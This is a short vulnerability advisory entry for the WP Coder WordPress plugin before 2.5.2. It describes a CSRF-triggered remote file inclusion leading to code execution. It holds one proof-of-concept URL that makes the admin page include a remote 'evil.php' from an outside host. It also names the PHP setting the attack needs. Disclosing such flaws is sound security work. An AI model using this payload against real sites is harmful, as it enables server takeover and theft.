Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:A5448599-64DE-43B0-B04D-C6492366EAB1
HistoryDec 05, 2021 - 12:00 a.m.

WP Coder < 2.5.2 - RFI leading to RCE via CSRF

2021-12-0500:00:00
Krzysztof Zając
190
wordpress
remote file inclusion
remote code execution
cross-site request forgery
php configuration

EPSS

0.001

Percentile

48.4%

The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F

PHP's allow_url_include must be set to "On"

EPSS

0.001

Percentile

48.4%

Related for WPEX-ID:A5448599-64DE-43B0-B04D-C6492366EAB1